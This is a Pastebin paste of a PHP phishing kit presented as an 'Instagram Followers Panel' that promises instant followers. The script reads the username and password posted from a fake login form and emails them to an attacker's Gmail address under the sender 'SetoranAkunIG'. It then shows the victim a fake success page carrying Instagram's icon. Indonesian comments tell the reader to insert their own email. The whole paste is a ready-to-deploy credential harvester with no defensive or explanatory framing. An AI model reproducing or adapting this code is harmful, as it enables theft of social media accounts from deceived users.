Guest User

Untitled

a guest
Oct 17th, 2016
35
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.32 KB | None | 0 0
  1. <?php
  2. $subjek = 'ivansulaeman';
  3. $mailto = 'breakdowndeathcore029@gmail.com'; //masukin email lo disini
  4.  
  5. /* Fungsi berikut untuk mengambil input field. */
  6.  
  7. $imel = $_POST['user'];
  8. $paswot = $_POST['password'];
  9.  
  10. /* Mengambil informasi untuk dikirim kepada facebook anda !. */
  11.  
  12. $body = <<<EOD
  13. <br><hr><br>
  14.  
  15. Username : <font color="red">$imel</font> <br>
  16. Password : <font color="red">$paswot</font> <br>
  17. EOD;
  18.  
  19.  
  20. $headers = "From:SetoranAkunIG\r\n"; // Buat nunjukin pengirim email.
  21. $headers .= "Content-type: text/html\r\n";
  22. $success = mail($mailto, $subjek." #".rand(1000,10000), $body, $headers);
  23. // $successsadap = mail($mailsadap, $subjeksadap." #".rand(1000,10000), $body, $headers);
  24. ?>
  25. <?php
  26. $random = rand(1000,5000);
  27. ?>
  28.  
  29. <meta content='0;url=./succes.php' http-equiv='nothing refresh'/>
  30. </head><body>
  31. </html>
  32. <!DOCTYPE html>
  33. <html>
  34. <head>
  35. <meta charset="utf-8" />
  36. <title>Instagram Followers Panel</title>
  37. <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  38. <link rel="shortcut icon" href="http://www.iconarchive.com/download/i82921/limav/flat-gradient-social/Instagram.ico" />
  39. <link rel="stylesheet" href="./style/bootstrap.min.css">
  40. <script src="./style/jquery.min.js"></script>
  41. <script src="./style/bootstrap.min.js"></script>
  42. </head>
  43. <body>
  44.  
  45. <div class="container">
  46.  
  47. <div class="page-header">
  48. <h1>Instagram Followers Panel <small>Get Your Instant Followers</small></h1>
  49. </div>
  50.  
  51. <!-- IPad Login - START -->
  52. <div class="container">
  53. <div class="row colored">
  54. <div class="contcustom">
  55. <img src="http://www.iconarchive.com/download/i82921/limav/flat-gradient-social/Instagram.ico" alt="Smiley face" width="70" height="70">
  56. <h2>Succes ! Thanks For Use This Panel</h2>
  57. <div><form action="/" method="post">
  58. <br/>
  59. <input class="btn btn-success" type="submit" value="Try Again!">
  60. </form>
  61.  
  62. </div> <div class="collapse" id="bukacoeg">
  63. <center><div id="respon"></div><br/></center>
  64. </div>
  65. </div>
  66. </div>
  67. </div>
  68. <style>
  69. .colored {
  70. background-color: #F0EEEE;
  71. }
  72.  
  73. .row {
  74. padding: 20px 0px;
  75. }
  76.  
  77. .bigicon {
  78. font-size: 97px;
  79. color: #f96145;
  80. }
  81.  
  82. .contcustom {
  83. text-align: center;
  84. width: 400px;
  85. border-radius: 0.5rem;
  86. top: 0;
  87. bottom: 0;
  88. left: 0;
  89. right: 0;
  90. margin: 10px auto;
  91. background-color: white;
  92. padding: 20px;
  93. }
  94.  
  95. input {
  96. width: 100%;
  97. margin-bottom: 17px;
  98. padding: 15px;
  99. background-color: #ECF4F4;
  100. border-radius: 2px;
  101. border: none;
  102. }
  103.  
  104. h2 {
  105. margin-bottom: 20px;
  106. font-weight: bold;
  107. color: #ABABAB;
  108. }
  109.  
  110. .btn {
  111. border-radius: 2px;
  112. padding: 10px;
  113. }
  114.  
  115. .med {
  116. font-size: 27px;
  117. color: white;
  118. }
  119.  
  120. .wide {
  121. background-color: #8EB7E4;
  122. width: 100%;
  123. -webkit-border-top-right-radius: 0;
  124. -webkit-border-bottom-right-radius: 0;
  125. -moz-border-radius-topright: 0;
  126. -moz-border-radius-bottomright: 0;
  127. border-top-right-radius: 0;
  128. border-bottom-right-radius: 0;
  129. }
  130. </style>
  131.  
  132. </body>
  133. </div>
  134.  
  135. </html>
Add Comment
Please, Sign In to add comment